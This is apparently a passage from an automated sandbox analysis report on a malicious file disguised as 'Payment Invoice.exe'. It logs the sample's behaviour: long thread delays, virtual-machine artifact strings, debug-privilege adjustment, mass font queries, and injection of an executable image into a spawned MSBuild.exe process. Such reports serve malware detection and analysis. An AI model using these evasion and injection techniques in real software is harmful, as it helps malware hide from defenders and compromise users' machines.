                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 93781Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 93625Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 93496Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 93341Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 93203Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 93067Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 92890Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 92765Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 92596Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 92471Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 92312Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 91906Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 91750Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 91603Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 91344Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 91137Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 90937Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 90547Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 88937Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 88531Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 88328Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 88125Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 87922Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 87765Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 87578Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 87416Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 87312Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 87203Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 87066Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 86937Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 86811Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 86703Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 86585Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 86464Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 86335Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 86209Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 86086Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 85953Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 85843Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 85734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98496Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98153Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97924Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97800Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96721Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96471Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95764Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94728Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94621Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94507Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94405Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 93953Jump to behavior
                Source: Amcache.hve.9.drBinary or memory string: VMware
                Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: MSBuild.exe, 00000005.00000002.3074523907.0000000005BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 728008Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Users\user\Desktop\Payment Invoice.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
